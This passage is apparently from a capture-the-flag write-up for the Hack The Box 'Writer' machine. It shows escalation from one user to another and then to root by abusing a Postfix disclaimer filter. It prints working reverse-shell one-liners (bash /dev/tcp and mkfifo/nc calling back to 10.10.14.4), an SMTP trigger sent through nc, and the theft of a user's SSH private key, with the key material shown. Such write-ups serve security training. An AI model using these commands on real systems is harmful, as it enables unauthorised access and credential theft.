mailman unix - n n - - pipe
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
${nexthop} ${user}
dfilt unix - n n - - pipe
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
kyle@writer:/etc/postfix$
The last line says about the mail sending format and the checks. The sender address should be from the email address under /etc/postfix/disclaimer_addresses
dfilt unix - n n - - pipe
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
kyle@writer:/etc/postfix$ cat /etc/postfix/disclaimer_addresses
root@writer.htb
kyle@writer.htb
I have used this script to insert the reverse shell into /etc/postfix/disclaimer and send an email.
echo "bash -c 'bash -i &>/dev/tcp/10.10.14.4/8989 0>&1'" > /etc/postfix/disclaimer && echo -e "HELO writer.htb\nMail From:kyle@writer.htb\nRCPT To: john@writer.htb\nData\nTo: john@writer.htb\nFrom: kyle@writer.htb\nSubject: Testing\nTesting\n." | nc localhost 25
220 writer.htb ESMTP Postfix (Ubuntu)
250 writer.htb
250 2.1.0 Ok
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
250 2.0.0 Ok: queued as 0B09F137
On the Netcat listener, i got the reverse shell
rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.101] 36994
bash: cannot set terminal process group (6455): Inappropriate ioctl for device
bash: no job control in this shell
cd /home/john/.ssh
cd /home/john/.ssh
ls -al
ls -al
total 20
drwx------ 2 john john 4096 Jul 9 2021 .
drwxr-xr-x 4 john john 4096 Aug 5 2021 ..
-rw-r--r-- 1 john john 565 Jul 9 2021 authorized_keys
-rw------- 1 john john 2602 Jul 9 2021 id_rsa
-rw-r--r-- 1 john john 565 Jul 9 2021 id_rsa.pub
cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAxqOWLbG36VBpFEz2ENaw0DfwMRLJdD3QpaIApp27SvktsWY3hOJz
wC4+LHoqnJpIdi/qLDnTx5v8vB67K04f+4FJl2fYVSwwMIrfc/+CHxcTrrw+uIRVIiUuKF
OznaG7QbqiFE1CsmnNAf7mz4Ci5VfkjwfZr18rduaUXBdNVIzPwNnL48wzF1QHgVnRTCB3
i76pHSoZEA0bMDkUcqWuI0Z+3VOZlhGp0/v2jr2JH/uA6U0g4Ym8vqgwvEeTk1gNPIM6fg
9xEYMUw+GhXQ5Q3CPPAVUaAfRDSivWtzNF1XcELH1ofF+ZY44vcQppovWgyOaw2fAHW6ea
TIcfhw3ExT2VSh7qm39NITKkAHwoPQ7VJbTY0Uj87+j6RV7xQJZqOG0A
With the key, we have ssh access. Make sure to chnage the permisson of the key to 600 before ssh.
ssh -i id_rsa_john john@10.10.11.101
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 18 Jun 01:05:46 UTC 2022
System load: 0.06
Usage of /: 64.1% of 6.82GB
Memory usage: 25%
Swap usage: 0%
Processes: 256
Users logged in: 1
IPv4 address for eth0: 10.10.11.101
IPv6 address for eth0: dead:beef::250:56ff:feb9:5a56
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19
john@writer:~$ pwd
/home/john
Alterneate method:
Script for sending mail using python. I have got this from some forum and uploaded [here](Rchitect/sendmail.py at Yoda · tcprks/Rchitect · GitHub).
kyle@writer:~$ cat sendmail.py
import smtplib
hostname = "127.0.0.1"
port = "25"
sender_email = "kyle@writer.htb" # Enter your address
receiver_email = "john@writer.htb" # Enter receiver address
message = "this is message to john from kyle"
try:
server = smtplib.SMTP(hostname, port)
server.ehlo() # Can be omitted
server.sendmail(sender_email, receiver_email, message)
# TODO: Send email here
except Exception as e:
# Print any error messages to stdout
print(e)
finally:
server.quit()
Insert the below reverse code in /etc/postfix/disclaimer
netcat rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f
Then immiditely send the mail and on the netcat listner we have reverse shell as john.
Since the reverse shell which i have got us not timeout fast, i have downloaded the private key for john and did ssh.
I could see he is part of group which has privilege of performing apt.conf file which can be exploited as per few posts like this.
I ran pspy to see if any crons running related to this and found one.
Somehow the commands mentioned on above exploit page does not work for me.
After some more search, i tried the similiar command after encoding to base 64.
We have a reverse shell as root now
Key learning Link to heading
Initial shell as kyle can be obtained by bruteforcing as well, however considering the longer time used for bruteforcing, sql inkection is preferred.
We have noticed initially that anonymous smb share access was not allowed. However once we got the password cracked through sql injection, the ssh does not work with that. We should rember to use the smb share access with those username and passowrd. This shows keep a note of the services/possible vulnrabilities through the exploiting session. Initially it may not work work however once we need to keep a note of these possible exploits untill end.
The box also teach on usage of python mail script. There are similiar pattern of scripts available over internet which can be used in other cases.